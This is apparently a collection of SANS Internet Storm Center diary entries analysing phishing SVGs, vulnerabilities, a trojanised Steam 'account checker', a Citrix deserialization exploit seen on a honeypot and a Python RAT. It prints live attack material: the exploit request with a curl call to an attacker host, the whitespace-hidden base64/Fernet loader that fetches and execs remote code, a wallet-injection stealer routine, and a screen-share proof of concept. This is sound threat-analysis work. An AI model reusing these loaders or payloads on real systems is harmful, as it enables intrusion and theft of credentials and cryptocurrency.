There is an increase in SVG attachments used in phishing emails (Scalable Vector Graphics, an XML-based vector image format).

I took a look at the some samples mentioned in the Bleeping Computer article, and searched more samples on VirusTotal.

These samples contain HTML & JavaScript code to display a blurry Excel PNG image, and a phishing form asking for credentials. Like this one:

It contains 3 PNG files as data URIs, which can easily be extracted with base64dump.py:

You have the blurry Excel PNG:

An Excel logo:

And a Microsoft logo:

I made some small changes to the sample, so that it would display an example.com email address, instead of a real victim's address that I would have to redact. The email address is hardcoded in BASE64 in the SVG file.

Here I made another example, using a SANS email address:

Do you see a difference, besides the SANS email address?

The SANS logo appears in the form!

Where did that logo come from, it's not embedded in the SVG file!

That logo is retrieved using a web service: logo[.]clearbit[.com].

As an example, here is the retrieval of the Wikipedia logo:

Here are the URLs in this SVG file:

There's JavaScript code inside this SVG file to make a web request and display the appropriate logo (or the embedded Microsoft logo, if the service doesn't provide a logo).

And the last URL you see in this screenshot, is where the form data will be posted (the phished credentials).

That one is the most prevalent in the samples I got from VirusTotal, but there are some other ones:

And I have one sample with heavily obfuscated JavaScript, without cleartext URLs. I'll keep that one for another diary entry ...

Didier Stevens
Senior handler
blog.DidierStevens.com

Today, Apple released updates patching two vulnerabilities that have already been exploited. Interestingly, according to Apple, the vulnerabilities have only been exploited against Intel-based systems, but they appear to affect ARM (M"x") systems as well.

CVE-2024-44308

A vulnerability in JavaScriptCore. It could be triggered by the user visiting a malicious web page and may lead to arbitrary code execution.

CVE-2024-44309

This vulnerability affects WebKit. A vulnerability in the cookie management system may lead to cross-site scripting. The description is sparse, but it may indicate that an attacker could set a malicious cookie that will inject JavaScript or HTML into a web page.

Patches have been released for Safari and all of Apple's operating systems (including iOS/iPadOS/VisionOS, which is not used on Intel-based systems).

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

Hello from Singapore where I'm with Johannes and Yee! This week, I'm teaching FOR710[1]. I spotted another Python script that looked interesting because, amongst the classic detection of virtualized environments, it also tries to detect the presence of a debugger. The script has been developed to target both environments: Windows & Linux.

On Windows, it's pretty easy to detect if a debugger has been attached to a process. The microsoft ecosystems has many ways to check this: A stealthy method is to check the PEB ("Process Environment Block")[2] that provides a "BeingDebugged" member in its structure. Another easy way is to use the Microsoft API call IsDebuggerPresent()[3]. Note that they are a lot of alternative techniques but I won't cover them here.

But how does it work in Linux? Because the malicious script is compatible with Linux, let's check the code:

def check_debugging():
    if True:
        try:
            if CURRENT_OS == "Windows":
                if ctypes.windll.kernel32.IsDebuggerPresent():
                    return True
            else:
                import re
                with open('/proc/self/status') as f:
                    status = f.read()
                    if re.search(r'TracerPid:\s+(?!0\n)', status):
                        return True
                except:
                    pass
    return False

If the script is executed on Windows, IsDebuggerPresent() will be called otherwise, the script will search for an interesting string in /proc/self/status:

xavier@rog:/proc/self$ cat status
Name:   bash
Umask:  0022
State:  S (sleeping)
Tgid:   352
Ngid:   0
Pid:    352
PPid:   351
TracerPid:      0
Uid:    1000    1000    1000    1000
Gid:    1000    1000    1000    1000
FDSize: 256
Groups: 4 20 24 25 27 29 30 44 46 116 1000
NStgid: 352
NSpid:  352
NSpgid: 352
NSsid:  352
VmPeak:     6216 kB
VmSize:     6216 kB
VmLck:         0 kB
VmPin:         0 kB
VmHWM:      5076 kB
VmRSS:      5076 kB
RssAnon:            1724 kB
RssFile:            3352 kB
RssShmem:              0 kB
VmData:     1736 kB
VmStk:       132 kB
VmExe:       892 kB
VmLib:      1864 kB
VmPTE:        48 kB
VmSwap:        0 kB
HugetlbPages:          0 kB
CoreDumping:    0
THP_enabled:    1
Threads:        1
SigQ:   1/30158
SigPnd: 0000000000000000
ShdPnd: 0000000000000000
SigBlk: 0000000000010000
SigIgn: 0000000000384004
SigCgt: 000000004b813efb
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 000001ffffffffff
CapAmb: 0000000000000000
NoNewPrivs:     0
Seccomp:        0
Seccomp_filters:        0
Speculation_Store_Bypass:       thread vulnerable
SpeculationIndirectBranch:      conditional enabled
Cpus_allowed:   ffff
Cpus_allowed_list:      0-15
Mems_allowed:   1
Mems_allowed_list:      0
voluntary_ctxt_switches:        91
nonvoluntary_ctxt_switches:     1

The highlighted "TracerPid" line with the "0" indicates that no process is "tracing" this one. In Linux, a common technique used to analyze the behavious of a process is to use a tool like strace[4] to log all the activity performed at system calls level:

xavier@rog:/proc/self$ strace -f -p 352

Let's recheck the /proc/self/status now that it's being "traced":

xavier@rog:/proc/self$ cat status|grep TracerPid
TracerPid:      9731

The script (SHA256a9ba5856b97327cc6c68d461e903569e30d5bd507405b5ecb34b0c513c42d50e)[5] remains undetected by most AV (VT score: 2/64) but its final purpose remains unknown because the bytecode passed to exec() does not seems to work! I'm still investigating it...

[1] https://www.sans.org/cyber-security-courses/reverse-engineering-malware-advanced-code-analysis/
[2] https://learn.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb
[3] https://learn.microsoft.com/en-us/windows/win32/api/debugapi/nf-debugapi-isdebuggerpresent
[4] https://man7.org/linux/man-pages/man1/strace.1.html
[5] https://www.virustotal.com/gui/file/a9ba5856b97327cc6c68d461e903569e30d5bd507405b5ecb34b0c513c42d50e/detection

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Last week, Watchtowr Labs released details describing a new and so far unpatched vulnerability in Citrix's remote access solution [1]. Specifically, the vulnerability affects the "Virtual Apps and Desktops." This solution allows "secure" remote access to desktop applications. It is commonly used for remote work, and I have seen it used in call center setups to isolate individual workstations from the actual desktop. The Watchtowr blog describes it as:

This is a tech stack that enables end-users (and likely, your friendly neighbourhood ransomware gang) to access their full desktop environment from just about anywhere, whether they’re using a laptop, tablet, or even a phone.

One fundamental problem with this solution is that all desktops run on the same server, and a privilege escalation vulnerability will not just "root" the particular desktop, but the server and all sessions connected to it.

Citrix also includes the ability to record sessions and store these recordings for an administrator to review. Sadly, the review process uses a .Net function subject to deserialization vulnerabilities. Watchtowr published sample exploit code on GitHub [2]. The exploit is triggered without the need to authenticate first.

So here is a sample exploit I have seen today:

[honeypot IP address redacted and non printable characters replaced with '.']

POST /msmq/private$/citrixsmaudeventdata HTTP/1.1
Host: [honeypot IP address]
Content-Type: multipart/related; boundary="MSMQ - SOAP boundary, 652036629"; type=text/xml
Content-Length: 3364
SOAPAction: "MSMQMessage"
Proxy-Accept: NonInteractiveClient

--MSMQ - SOAP boundary, 652036629
Content-Type: text/xml; charset=UTF-8
Content-Length: 794

<se:Envelope xmlns:se="http://schemas.xmlsoap.org/soap/envelope/" xmlns="http://schemas.xmlsoap.org/srmp/"><se:Header><path xmlns="http://schemas.xmlsoap.org/rp/" se:mustUnderstand="1"><action>MSMQ:</action><to>HTTP://[honeypot IP address]/msmq/Private$/CitrixSmAudEventData</to><id>uuid:7188@c7a285f3-bbdc-41cf-8476-23b4ee72d083</id></path><properties se:mustUnderstand="1"><expiresAt>20380119T031407</expiresAt><sentAt>20241117T205915</sentAt></properties><Msmq xmlns="msmq.namespace.xml"><Class>0</Class><Priority>3</Priority><Correlation>AAAAAAAAAAAAAAAAAAAAAAAAAAA=</Correlation><App>0</App><BodyType>768</BodyType><HashAlgorithm>32782</HashAlgorithm><SourceQmGuid>c7a285f3-bbdc-41cf-8476-23b4ee72d083</SourceQmGuid><TTrq>20241121T205915</TTrq></Msmq></se:Header><se:Body></se:Body></se:Envelope>
--MSMQ - SOAP boundary, 652036629
Content-Type: application/octet-stream
Content-Length: 2282
Content-Id: body@c7a285f3-bbdc-41cf-8476-23b4ee72d083

......................ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089.......System.Collections.Generic.SortedSet`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].....Count.Comparer.Version.Items.......System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]......... ........ ...........System.Collections.Generic.ComparisonComparer`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]....._comparison."System.DelegateSerializationHolder ..................1/c curl http://91.212.166.60/script_xen80-mix.php......cmd....."System.DelegateSerializationHolder.....Delegate.method0.method1...0System.DelegateSerializationHolder+DelegateEntry/System.Reflection.MemberInfoSerializationHolder/System.Reflection.MemberInfoSerializationHolder .... ...

........0System.DelegateSerializationHolder+DelegateEntry.....type.assembly.target.targetTypeAssembly.targetTypeName

methodName

delegateEntry.......0System.DelegateSerializationHolder+DelegateEntry.......System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].....Kmscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089

.

...ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089......System.Diagnostics.Process......Start ..... .../System.Reflection.MemberInfoSerializationHolder.....Name.AssemblyName ClassName Signature

Signature2

MemberType.GenericArguments........

System.Type[] ....

... .........>System.Diagnostics.Process Start(System.String, System.String).....>System.Diagnostics.Process Start(System.String, System.String)....

.

... .........Compare .........

System.String.....+Int32 Compare(System.String, System.String).....2System.Int32 Compare(System.String, System.String)....

..............qSystem.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] ....

.... .... ....

.--MSMQ - SOAP boundary, 652036629--

The exploit attempts to execute the command 

curl http://91.212.166.60/script_xen80-mix.php

Sadly, I am getting a 404 error attempting to access the URL, but it is possible that the attacker filters the incoming request by IP address, or maybe they collect requesting IP addresses for follow-up attacks.

The requests appear to originate from %%ip:192.143.1.40%%, an IP associated with an ISP in Johannesburg, South Africa.

[1] https://labs.watchtowr.com/visionaries-at-citrix-have-democratised-remote-network-access-citrix-virtual-apps-and-desktops-cve-unknown/
[2] https://github.com/watchtowrlabs/Citrix-Virtual-Apps-XEN-Exploit/blob/main/exploit-citrix-xen.py

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

There are so many vulnerabilities in commonly used routers that attackers often leave many easily exploited vulnerabilities untouched, as they already have plenty of vulnerabilities to exploit. 

Looking today at our "First Seen URL" page, I noticed this odd URL:

/userRpmNatDebugRpm26525557/start_art.html

The URL is very "specific" in including a number, and at first, I suspected a web shell placed by an attacker. But turns out, this backdoor comes (came?) preinstalled in many TP-Link routers.

One reason that this has not been exploited more so far is likely the fact that the original discovery was published in a bit an obscure place [https://sekurak.pl/tp-link-httptftp-backdoor/] and didn't include a lot of details, other than run-through showing how to exploit the vulnerability. 

The issue was originally discovered over ten years ago. It is not clear if it was ever patched. The discoverer of the vulnerability does indicate that they (after some false starts) made contact with TP-Link. There appears to be no CVE number assigned to the vulnerability.

Another reason this backdoor is a bit more difficult to exploit than other vulnerabilities is the need for a TFTP server. As explained in the blog post above, sending a request to the URL initiates a tftp request from the router to the IP address sending the request. The tftp request will retrieve a file, "nart.out". The file will alter be executed.

I just hope TP-Link has fixed the issue after 12 years, and vulnerable routers are either no longer operational after such a long time or have been patched (or at least secured to the point that the admin web page is not accessible from the internet).

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

This month, Microsoft is addressing a total of 83 vulnerabilities. Among these, 3 are classified as critical, 2 have been exploited in the wild, and another 2 have been disclosed prior to Patch Tuesday. Organizations are encouraged to prioritize these updates to mitigate potential risks and enhance their security posture.

Notable Vulnerabilities:

NTLM Hash Disclosure Spoofing Vulnerability (CVE-2024-43451)
This vulnerability, identified as CVE-2024-43451, has been exploited and disclosed, carrying an Important severity rating with a CVSS score of 6.5. It allows an attacker to disclose a user's NTLMv2 hash, enabling them to authenticate as that user, which could lead to a total loss of confidentiality. Exploitation requires minimal user interaction, such as selecting or inspecting a malicious file. The vulnerability affects all supported versions of Microsoft Windows, and while Internet Explorer has been retired on certain platforms, updates addressing this vulnerability are included in the IE Cumulative Updates to ensure continued protection.

Windows Task Scheduler Elevation of Privilege Vulnerability (CVE-2024-49039)
This vulnerability, identified as CVE-2024-49039, has a severity rating of Important with a CVSS score of 8.8 and is currently being exploited in the wild, although it has not been disclosed publicly. An authenticated attacker can exploit this vulnerability by running a specially crafted application on the target system, allowing them to elevate their privileges to a Medium Integrity Level. Successful exploitation could enable the attacker to execute RPC functions that are typically restricted to privileged accounts, thereby compromising the security of the system. Remediation efforts should focus on monitoring for unauthorized applications and ensuring that only trusted software is executed on systems to mitigate the risk of exploitation.

Active Directory Certificate Services Elevation of Privilege Vulnerability (CVE-2024-49019)
This vulnerability, identified as CVE-2024-49019, has been disclosed but is not currently exploited in the wild. It carries a severity rating of Important with a CVSS score of 7.8, allowing an attacker to potentially gain domain administrator privileges. The vulnerability affects certificates created using a version 1 certificate template with the Source of subject name set to "Supplied in the request," particularly if the template is not secured according to best practices. To mitigate this risk, organizations are advised to remove overly broad enrollment permissions, eliminate unused templates from certification authorities, and secure templates that allow specification of the subject in requests through additional signatures, certificate manager approval, and monitoring of issued certificates.

Windows Kerberos Remote Code Execution Vulnerability (CVE-2024-43639)
This critical vulnerability, with a CVSS score of 9.8, has not been exploited in the wild nor disclosed publicly. It allows an unauthenticated attacker to leverage a cryptographic protocol vulnerability in Windows Kerberos to perform remote code execution against the target using a specially crafted application. The potential impact of this vulnerability underscores the importance of monitoring and securing systems against unauthorized access and exploitation.

Microsoft Windows VMSwitch Elevation of Privilege Vulnerability (CVE-2024-43625)
This critical vulnerability, identified as CVE-2024-43625, has a CVSS score of 8.1 and is currently not exploited or disclosed publicly. It allows an attacker with low privileges on a Hyper-V guest to traverse the security boundary and execute code on the Hyper-V host, potentially gaining SYSTEM privileges. The exploitation requires a high level of complexity, as the attacker must gather specific environmental information and perform additional preparatory actions before sending a specific series of networking requests to the VMswitch driver, triggering a use-after-free vulnerability. Notably, this vulnerability is confined to the VmSwitch component within Hyper-V and does not affect the System Center Virtual Machine Manager (SCVMM).

This summary highlights key vulnerabilities for this Patch Tuesday. Notably, CVE-2024-43451, a NTLM hash disclosure vulnerability, poses a significant risk due to its exploitation potential with minimal user interaction. CVE-2024-49039, an elevation of privilege vulnerability, is actively exploited and requires immediate attention. Additionally, CVE-2024-49019 allows potential domain admin access, necessitating strict certificate management. Critical vulnerabilities like CVE-2024-43639 (CVSS 9.8) and CVE-2024-43625, while not currently exploited, demand proactive monitoring and security measures. Prioritize patching and monitoring to mitigate these risks effectively.

November 2024 Security Updates

--
Renato Marinho
LinkedIn|Twitter

The first thing to do, when analyzing a potentially malicious PDF, is to look for the /Encrypt name as explained in diary entry Analyzing an Encrypted Phishing PDF.

The second thing to do, is to look for the /ObjStm name, as I will explain in this diary entry.

Take this phishing PDF and analyze it with pdfid.py, like this:

The presence of name /ObjStm tells us that there are Object Streams inside the PDF: an Object Stream is an object with a stream, that contains other objects (without stream). Since streams are usually compressed, pdfid.py is not able to find the keywords of the objects inside the Object Stream (since pdfid is a kind of string search tool that doesn't parse the structure of PDF documents). You need to use pdf-parser.py in stead.

Use option -a to let pdf-parser.py produce statistics and option -O to parse Object Streams. Like this:

At the end of the statistics report, you will see the search keywords report, reporting names similar to pdfid.py's names report.

But here, you also get the index of the objects with these names, not just a counter like pdfid.py does. So there is 1 /URI name, and it is in object 6.

Next we take a look at object 6 with pdf-parser.py:

And that reveals the phishing URL.

Another method to find URIs is to use the keyword option (-k), like this:

To summarize: first look for /Encrypt, then /ObjStm, and then start your analysis.

Didier Stevens
Senior handler
blog.DidierStevens.com

In yesterday's diary entry "zipdump & Evasive ZIP Concatenation" I showed how one can inspect the PKZIP records that make up a ZIP file.

My tool zipdump.py can also inspect the data of PKZIP file records, and decompress it (not decrypt it).

To select the data of a PKZIP file record, use option -s data. Here we also use option -a to do a hex-ascii dump of the data:

When option -d is used (to perform a binary dump), only the raw data is send to stdout, no other metadata:

And when option -s decompress is used, the data is decompressed (only INFLATE is supported):

These options could also be helpful for corrupt ZIP files.

Didier Stevens
Senior handler
blog.DidierStevens.com

On Friday's Stormcast, Johannes talks about Evasive ZIP Concatenation, a technique where 2 (or more) ZIP files are concatenated together to evade detection.

This gives me a good opportunity to remind you that my zip analysis tool zipdump.py can handle this type of file.

zipdump uses Python's zipfile module (or pyzipper if you install it), and if you just run it on this type of file without any opions, you get the listing of the last ZIP file:

But when you use option -f, zipdump will not use Python's zipfile module, but directly analyze PKZIP records.

When you use option -f l (l stands for listing), you will get a listing of all PKZIP records found inside the provided file:

There are 6 PKZIP records here, making up 2 ZIP files. To analyze the content of the first ZIP file with Python's zipfile module, use option -f 1:

And use option -f 2 for the second ZIP file:

You can then use zipdump's other options to analyze the file, for example:

zipdump can also analyze individual PKZIP records, you select one by providing it's position inside the file, as it appears in the listing (-f l):

Didier Stevens
Senior handler
blog.DidierStevens.com

The SANS Holiday Hack Challenge is open early this year:

Enjoy! :-)

Didier Stevens
Senior handler
blog.DidierStevens.com

I found an interesting script targeting Steam users. Steam[1] is a popular digital distribution platform for purchasing, downloading, and playing video games on personal computers. The script is called "steam-account-checker" and is available in Github[2]. Its description is:

steam account checker ? check your steam log 2024 ? simple script that validates steam logins fast and easy.

Updated two months ago, the script seems obfuscated and looks nice when checked online:

But if you download the file and check it carefully:

remnux@remnux:/MalwareZoo/20241106$ xxd checker.py|head -10
00000000: 696d 706f 7274 206f 7320 2020 2020 2020  import os       
00000010: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000020: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000030: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000040: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000050: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000060: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000070: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000080: 2020 2020 2020 2020 2020 2020 2020 2020                  
00000090: 2020 2020 2020 2020 2020 2020 2020 2020

The author used a simple trick to hide malicious code: The first line appends space characters (0x20) to hide the following code. Read: It's not displayed in an editor that does not wrap up long lines. Let's remove them and the first line will look like this:

import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ;import base64;exec(base64.b64decode('b3Muc3lzdGVtKCdwaXAgaW5zdGFsbCBjcnlwdG9ncmFwaHknKTtvcy5zeXN0ZW0oJ3BpcCBpbnN0YWxsIHJlcXVlc3RzJyk7b3Muc3lzdGVtKCdwaXAgaW5zdGFsbCBmZXJuZXQnKTtpbXBvcnQgcmVxdWVzdHM7ZnJvbSBmZXJuZXQgaW1wb3J0IEZlcm5ldDtleGVjKEZlcm5ldChiJ005bzhZQWpPWTVnMlBSMlZFeVFMTlZfQjNzZkgtejIwNUhxX1lSNVRJVmM9JykuZGVjcnlwdChiJ2dBQUFBQUJtOFoxY2tsTDA0QllhLWg1dEhkNkdBaUhrT1VTVldpRmw4UlFaUi1GTFlHcVBYbVR3cm5iVmZ2S2F2aWhva1BEZTY0d092S21LQ0U5a3BhcTVYYTlycWxPNlRMU1oxZHNNTVlwdG80X3lJeElTZElLaGRROW9ZREhhNzgwMVYySW9IVkY4aEhXVjZzeEtwZFVaUHphaEJzMHpSM2NKTVZELVN2cmNRdlFKQkMzNGU2bV9BbGptMnJNb190M2Rkb0stZ0hhY09YRVYzWmRicmM1bXU5UWQzS09DcXFqQzEtNUV3WmxEYlJPUEx5cUg3aE09Jykp').decode())

Let's decode the payload:

remnux@remnux:/MalwareZoo/20241106$ base64dump.py checker.py -n 10 -s 1 -d
os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'M9o8YAjOY5g2PR2VEyQLNV_B3sfH-z205Hq_YR5TIVc=').decrypt(b'gAAAAABm8Z1cklL04BYa-h5tHd6GAiHkOUSVWiFl8RQZR-FLYGqPXmTwrnbVfvKavihokPDe64wOvKmKCE9kpaq5Xa9rqlO6TLSZ1dsMMYpto4_yIxISdIKhdQ9oYDHa7801V2IoHVF8hHWV6sxKpdUZPzahBs0zR3cJMVD-SvrcQvQJBC34e6m_Aljm2rMo_t3ddoK-gHacOXEV3Zdbrc5mu9Qd3KOCqqjC1-5EwZlDbROPLyqH7hM='))

The code is encrypted via Fernet, a common symmetric encryption algorithm used in many Python scripts. The decoded and executed payload is:

b"exec(requests.get('hxxps://dieserbenni[.]ru/paste?repo=steam-account-checker').text.replace('<pre>','').replace('</pre>',''))"

The attacker protected this URL behind CloudFlare and you need to use the right user agent to access the content (the Python UA):

import sys
import subprocess
import os
subprocess.run(["cmd.exe", "/c", sys.executable, "-m", "pip", "install", "fernet"], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
from fernet import Fernet
content = """
from fernet import Fernet
exec(Fernet(b'fopcqWb6WnzpGsWKJI6vm5-Tf9ac8fHEzLesIk7H8qg=').decrypt(b'gAAAAABn ...(Redacted) ... eiBpcnmJDPW2Ll4LgI=').decode())
"""
gruppe_path = os.path.join(os.getenv('APPDATA'), 'gruppe.py')

with open(gruppe_path, 'w') as file:
    file.write(content)

subprocess.Popen([sys.executable, gruppe_path],creationflags=subprocess.CREATE_NO_WINDOW | subprocess.DETACHED_PROCESS)

This payload will install the Fernet module (which should already be installed if you reach this step), decode another payload, save it to a file in %APPDATA%, and execute it.

I looked at this payload; it remains a classic info stealer. It injects malicious code in Exodus (I already covered this technique in another diary[3]): 

def inject():
    procc = "exodus.exe"
    local = os.getenv("localappdata")
    path = f"{local}/exodus"
    if not os.path.exists(path): return
    listOfFile = os.listdir(path)
    apps = []
    for file in listOfFile:
        if "app-" in file:
            apps += [file]
    exodusPatchURL = "https://dieserbenni.ru/app.asar"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.82 Safari/537.36"}
    req = Request(exodusPatchURL, headers=headers)
    response = urlopen(req)
    data = response.read()
    subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
    for app in apps:
        try:
            fullpath = f"{path}/{app}/resources/app.asar"
            with open(fullpath, 'wb') as out_file1:
                out_file1.write(data)
        except: pass

This infostealer is almost identical to the one covered in my previous diary but this time, collected data are exfiltrated to hxxps://dieserbenni[.]ru/delivery.

Based on github.com, files have not been modified, just uploaded once. This means that the malicious code has been added on purpose. 

Conclusion: Pay attention to the code you download from github.com; it may always contain some "gifts"!

[1] https://store.steampowered.com
[2] https://github.com/adexcedaom/steam-account-checker
[3] https://isc.sans.edu/diary/Python+Infostealer+Patching+Windows+Exodus+App/31276

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

[This is a Guest Diary by Trevor Coleman, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].

Figure 1: ISC Web Honeypot Log Overview Chart [2]

The month of August brought with it a notable surge in web traffic log activities, catching my attention. As I delved into investigating the underlying causes of this spike, I uncovered some concerning findings that shed light on the potential risks organizations face in today's digital landscape.

The web honeypot log traffic, as parsed in the DShield-SIEM dashboard [3], served as a visual representation of the significant increase in activity. With over 62,000,000 activity logs originating from a single IP source, it was evident that something was amiss, comparatively to the second most source at 757,000.  The most observed activity was directed towards destination ports 5555, 7547, and 9000, indicating a targeted effort to exploit vulnerabilities in web applications.  Ports 5555 and 9000 are commonly used in malware attacks for known vulnerabilities on webservers.

Figure 2: DShield-SIEM Traffic Analytics for IP %%ip: 23.95.107.6%%.

Figure 3: Five IP addresses with highest traffic volume in August.

Analysis of the HTTP requests to the web honeypot revealed that the attacker exploited various known vulnerabilities. Out of the total requests, 57,243,299 (92%) were GET requests, 4,960,056 (8%) were POST requests, while there were significantly fewer PUT (18,466) and DELETE (4,150) requests. Figure 5 shows the top 5 http request methods and corresponding logs and count of each attempt. Note only 2 different PATCH request types were present.

Figure 4: Top HTTP Request Methods and Logs for IP %%ip:23.95.107.6%%.

These included path traversal, Nuclei exploits, open redirect in Bitrix site manager, SQL injection, and PHP/WordPress attacks. The frequency and nature of these attacks pointed towards a well-orchestrated campaign aimed at compromising systems and gaining unauthorized access to sensitive information [4][5][6].

The attacker's use of scanning capabilities to identify known exploits and CVEs, as well as the observation of Mitre ATT&CK techniques and tactics [7], highlighted the sophistication of the threat actors behind these malicious activities. The ultimate goal of this attack was clear - to exploit vulnerabilities in web applications and compromise target systems for nefarious purposes.

In order to protect systems from such attacks, it is imperative for organizations to implement a multi-layered defense strategy. This includes the following measures:

• Deploy a web application firewall to monitor and filter incoming and outgoing traffic.
• Ensure continuous application patching to address known vulnerabilities and mitigate risks.
• Conduct frequent web application vulnerability scans to identify and remediate CVEs.
• Perform annual web penetration tests to proactively identify weaknesses and shore up defenses.
• Monitor GET and POST request traffic exposed to the internet to detect and respond to suspicious activities.
• Close unnecessary ports and services to minimize the attack surface and reduce potential entry points for threat actors.

Furthermore, it is important to keep a watchful eye on IP addresses associated with malicious activities and take appropriate action to mitigate risks. In this case, the IP address 23.95.107.6, leased by RackNerd LLC, has been flagged for abuse due to web application attacks [8][9]. RackNerd, which provides Infrastructure-as-a-Service (IaaS), including VPS and dedicated servers with headquarters in Los Angeles, California.

Ports 22, 5222, and 5269 were found to be open on this device [10]. Ports 5222 and 5269 are commonly used for Extensible Messaging and Presence Protocol (XMPP) for chat clients such as Jabber, Google Talk and WhatsApp to name a few [11][12].  This situation further highlighting the need for heightened vigilance and remediation efforts.

In conclusion, the recent surge in web traffic log activities serves as a stark reminder of the evolving cybersecurity threat landscape and the importance of proactive defense measures. By staying informed, conducting regular vulnerability assessments, and implementing robust security protocols, organizations can strengthen their resilience against cyber threats and safeguard their digital assets from malicious actors.

[1] https://www.sans.edu/cyber-security-programs/bachelors-degree/
[2] https://isc.sans.edu/myweblogs/
[3] https://github.com/bruneaug/DShield-SIEM/blob/main/README.md
[4] https://www.cve.org/CVERecord?id=CVE-2024-1561
[5] https://nvd.nist.gov/vuln/detail/CVE-2024-27920
[6] https://www.cvedetails.com/cve/CVE-2008-2052/
[7] https://attack.mitre.org/tactics/TA0043/    
[8] https://www.virustotal.com/gui/ip-address/23.95.107.6/detection
[9] https://www.abuseipdb.com/check/23.95.107.6
[10] https://www.shodan.io/host/23.95.107.6  
[11] https://www.speedguide.net/port.php?port=5222
[12] https://www.speedguide.net/port.php?port=5269

While hunting, I found another interesting Python RAT in the wild. This is not brand new because the script was released two years ago[1]. The script I found is based on the same tool and still has a low VT score: 3/64 (SHA256:1281b7184278f2a4814b245b48256da32a6348b317b83c440008849a16682ccb)[2]. The RAT has a lot of features to control the victim's computer:

remnux@remnux:/MalwareZoo/20241021$ egrep "command ==" client.pyw 
            if command == 'shell':
                    if command == 'cd':
            elif command == 'screenshare':
            elif command == 'webcam':
            elif command == 'breakstream':
            elif command == 'list':
            elif command == 'geolocate':
            elif command == 'setvalue':
            elif command == 'delkey':
            elif command == 'createkey':
            elif command == 'volumeup':
            elif command == 'volumedown':
            elif command == 'setwallpaper':
            elif command == 'usbdrivers':
            elif command == 'monitors':
            elif command == 'sysinfo':
            elif command == 'reboot':
            elif command == 'pwd':
            elif command == 'ipconfig':
            elif command == 'portscan':
            elif command == 'tasklist':
            elif command == 'profiles':
            elif command == 'profilepswd':
            elif command == 'systeminfo':
            elif command == 'sendmessage':
            elif command == 'disableUAC':
            elif command == 'turnoffmon':
            elif command == 'turnonmon':
            elif command == 'extendrights':
            elif command == 'isuseradmin':
            elif command == 'keyscan_start':
            elif command == 'send_logs':
            elif command == 'stop_keylogger':
            elif command == 'cpu_cores':
            elif command == 'cd ..':
            elif command == 'dir':
            elif command == 'curpid':
            elif command == 'drivers':
            elif command == 'shutdown':
            elif command == 'disabletaskmgr':
            elif command == 'enabletaskmgr':
            elif command == 'localtime':
            elif command == 'upload':
            elif command == 'browser':
            elif command == 'screenshot':
            elif command == 'webcam_snap':
            elif command == 'exit':
            elif command == "PASSWORDS":

Taking screenshots is a classic feature but one of the commands attracted my attention: "screenshare". Let's have a closer look at this one:

try:
    from vidstream import ScreenShareClient
    screen = ScreenShareClient(self.host, 8080)
    screen.start_stream()
except:
    s.send("Impossible to get screen")

The magic feature is provided by the "vidstream" Python library. This library has not been updated for a few years but still does a great job. I made a quick proof-of-concept to demonstrate this nice capability of the RAT:

Let's run a server on the attacker's computer:

import time
from vidstream import StreamingServer
server = StreamingServer('192.168.131.205', 9999)
server.start_server()
print("Waiting for victim...")
while True:
    time.sleep(10)
# When You Are Done
server.stop_server()

On the victim's computer, let's run the following code:

from vidstream import CameraClient
from vidstream import VideoClient
from vidstream import ScreenShareClient
client1 = ScreenShareClient('192.168.131.202', 9999)
client1.start_stream()

In the screenshot below, the victim's VM is on the left (Windows 11), and the attacker's VM is on the right (REMnux):

Once the client is connected to the server, a window opens with a copy of the victim's screen. I recorded a short video when playing with the desktop[4]:

 Another good proof of why Python became a popular language for attackers, even for Windows environments!

[1] https://github.com/FZGbzuw412/Python-RAT/tree/main
[2] https://www.virustotal.com/gui/file/1281b7184278f2a4814b245b48256da32a6348b317b83c440008849a16682ccb
[3] https://pypi.org/project/vidstream/
[4] https://youtu.be/FrUs7gUMLTs

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Once in a while, I get a question about my pdf-parser.py tool, not able to decode strings and streams from a PDF document.

